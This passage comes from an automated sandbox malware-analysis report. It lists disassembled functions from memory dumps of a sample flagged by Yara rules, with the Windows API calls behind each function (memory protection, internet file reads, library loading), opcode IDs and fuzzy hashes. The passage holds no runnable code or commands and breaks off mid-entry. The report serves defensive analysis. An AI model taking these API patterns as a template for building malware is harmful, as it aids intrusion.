                                                • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                                Function 04D14410 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16
                                                • String ID:
                                                • API String ID: 3509577899-0
                                                • Opcode ID: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                                • Instruction ID: ec9159dd719152ee56e081e5dbcf39efff09a47483e4cec4d898f1dfc61a800f
                                                • Opcode Fuzzy Hash: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                                • Instruction Fuzzy Hash: DC51C172700246BFFB219F60AC88EBB7AA9FF44754B150129FE06E7160EA70ED50C670
                                                Function 04B62C87 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B62D2F
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B62D44
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B62D52
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B62D6D
                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B62D8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                • String ID:
                                                • API String ID: 2509773233-0
                                                • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                • Instruction ID: aa29f0a53a87efdca3b8d4ccbf5e30c5ab76ea25d296fa1f5bf85d65b6e82532
                                                • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                • Instruction Fuzzy Hash: 3F310635B00104AFEB14EF58DC40FAAB7A8EF48704F4541E9EA06EB251DB75AD16CB94
                                                Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                • String ID:
                                                • API String ID: 3136044242-0
                                                • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 1000C536
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000C548
                                                • _free.LIBCMT ref: 1000C55A
                                                • _free.LIBCMT ref: 1000C56C
                                                • _free.LIBCMT ref: 1000C57E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                Function 0040CA97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                                • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                                • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                                Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                Function 0041968C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(024FEF0D,00000000,00000000,00000000), ref: 004196EF
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                                • GetLastError.KERNEL32 ref: 00419A2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                                • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                                • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                                • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                                Function 04B798F3 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04B79956
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04B79BA8
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B79BEE
                                                • GetLastError.KERNEL32 ref: 04B79C91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                                • Instruction ID: c073fabe6c199c26e3a0ace4ca3f7d44283233d76fff13b42722d94a971cc813
                                                • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                                • Instruction Fuzzy Hash: 02D16DB5E002489FDF15CFA8D880AEDBBF4FF49314F2445AAE466EB351D630A942CB50
                                                Function 04B61BA7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B61C3C
                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B61C5F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileInternet$PointerRead
                                                • String ID:
                                                • API String ID: 3197321146-0
                                                • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                                • Instruction ID: 69cfd244da9a608e69bd2cb16ad7009b851131181409179ddab56424a3b9cf99
                                                • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                                • Instruction Fuzzy Hash: AFC13DB1A002189FEB25DF68CC84BE9B7B4FF49304F1041D9E50AA7290D779AE94CF91
                                                Function 0040BA64 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                                Function 04D0AE64 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: 755a7699ecabb4809121f894f986286a0dee8b284502aa13d34702f41478052f
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: E5518CB2701706AFEB299E50D840B6ABBA4FF20714F14C52AE845873D0E771F881C7A0
                                                Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                Function 04B6BCCB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction ID: 340d734db56ae85234b04bedce85f950010823db6834e3dc1dfd691e7d4d89b6
                                                • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                                • Instruction Fuzzy Hash: 6551D372609626AFEF298F14D840BBA77B4EF04314F1448ADD947CB290E739F990DB90
                                                Function 04B61837 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 04B6183C
                                                  • Part of subcall function 04B69AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04B69AB5
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04B61872
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04B618A9
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 04B619BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                • String ID:
                                                • API String ID: 2123813255-0
                                                • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                                • Instruction ID: d6426903c15358d96033bd18b3cb80f0710a9c14b17eae6fd482e8f35be6797b
                                                • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                                • Instruction Fuzzy Hash: 234109B1A00300ABE7149F689C84B5AB6F8EF48314F100AB9E95BD72C0E775BD05C7A1
                                                Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                  • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                • GetLastError.KERNEL32 ref: 10007C36
                                                • __dosmaperr.LIBCMT ref: 10007C3D
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                • __dosmaperr.LIBCMT ref: 10007C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                Function 004174A4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • GetLastError.KERNEL32 ref: 00417508
                                                • __dosmaperr.LIBCMT ref: 0041750F
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                                • __dosmaperr.LIBCMT ref: 00417550
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                                • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                                Function 04B7770B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
                                                • GetLastError.KERNEL32 ref: 04B7776F
                                                • __dosmaperr.LIBCMT ref: 04B77776
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 04B777B0
                                                • __dosmaperr.LIBCMT ref: 04B777B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction ID: f9c6555ca395e816ce5eb2016eed6f05a6ec86466c019929ece6fd78cfc82b9d
                                                • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                • Instruction Fuzzy Hash: 4C216571704205AFAB10AF75CCC4C6BB7ADFF4826871085A9E93A97250EB35FC518760
                                                Function 004111DB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                                • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                                Function 04B71442 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction ID: d8e0662e495cbf0cbe128227989cdcc52a6003312a18ed6af66c14456b27014d
                                                • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction Fuzzy Hash: 96216F71300205AFAB24AF7DCC8096B77ADEF442A870485A5E93A97350E734F9018BB0
                                                Function 00418445 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                                • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                                Function 04B735A0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,04B736AF,04B637FE,?,00000000,04B62A70,04B62A72,?,04B73828,00000022,00420B0C,00422950,00422958,04B62A70), ref: 04B73661
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction ID: 572158fbaea3e9bfc879e17411d746dadbaa68648cda79434c784f8715c7c2a2
                                                • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction Fuzzy Hash: 2B21D576B05211ABC7319F25ECC0A5A3BA9DB42760F1511B0ED26A7391EB30FE06E694
                                                Function 04B786AC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 04B786B4
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
